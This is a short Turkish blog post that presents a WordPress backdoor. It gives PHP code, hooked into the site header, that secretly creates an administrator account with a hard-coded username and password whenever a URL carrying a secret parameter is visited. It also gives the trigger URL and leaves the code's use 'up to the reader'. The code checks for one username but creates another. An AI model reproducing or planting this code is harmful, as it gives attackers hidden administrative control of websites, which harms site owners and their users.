Backdoor yani Türkçe anları arka kapı olan bu basit hack türünü WordPress’e göre düzenlenmiş halidir. Kullanım gayet basit. Eklemeniz gereken kod aşağıda.
Wordpress Backdoor
add_action( 'wp_head', 'my_backdoor' );
function my_backdoor() {
if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) {
require( 'wp-includes/registration.php' );
if ( !username_exists( 'mr_admin' ) ) {
$user_id = wp_create_user( 'admincan', 'sifresifre' );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
}
Daha sonra bu işleme ulaşmak için URL; “http://www.site.com/?backdoor=go”
Bu kodun yaptığı tam olarak URL çağırıldığında “admincan” kullanıcı adında, “sifresifre” şifreli bir yönetici hesabını gizli bir şekilde oluşturmaktadır. Kullanım alanı size kalmış 
Hiç yorum yok:
Yorum Gönder